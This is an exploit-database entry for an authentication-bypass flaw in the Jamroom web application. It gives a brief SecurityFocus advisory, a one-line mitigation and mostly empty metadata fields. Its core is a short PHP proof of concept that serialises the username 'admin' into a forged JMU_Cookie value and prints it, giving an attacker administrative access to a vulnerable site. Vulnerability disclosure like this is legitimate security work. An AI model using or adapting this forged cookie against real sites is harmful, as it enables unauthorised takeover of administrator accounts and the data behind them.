header-logo
Suggest Exploit
vendor:
Jamroom
by:
SecurityFocus
7.5
CVSS
HIGH
Authentication-Bypass
287
CWE
Product Name: Jamroom
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Jamroom Authentication-Bypass Vulnerability

Jamroom is prone to fourteen security vulnerabilities, including an authentication-bypass vulnerability that occurs because the application fails to verify user-supplied data. An attacker can exploit the authentication-bypass vulnerability to gain administrative access to the affected application; other attacks are also possible.

Mitigation:

Ensure that user-supplied data is properly verified before being used.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/30406/info

Jamroom is prone to fourteen security vulnerabilities, including an authentication-bypass vulnerability that occurs because the application fails to verify user-supplied data.

Very few technical details are available regarding the remaining security vulnerabilities. We will update this BID when more information is disclosed.

An attacker can exploit the authentication-bypass vulnerability to gain administrative access to the affected application; other attacks are also possible. Effects of the remaining security vulnerabilities are not currently known. 

<?php
$data = array();
$user = 'admin'; // Target

$data[0] = base64_encode(serialize($user));
$data[1] = (bool)0;
echo "\n\n===[ 0 ] ========================\n\n";
echo 'Cookie: JMU_Cookie=' . urlencode(serialize($data));
$data[1] = (bool)1;
echo "\n\n===[ 1 ] ========================\n\n";
echo 'Cookie: JMU_Cookie=' . urlencode(serialize($data));
?>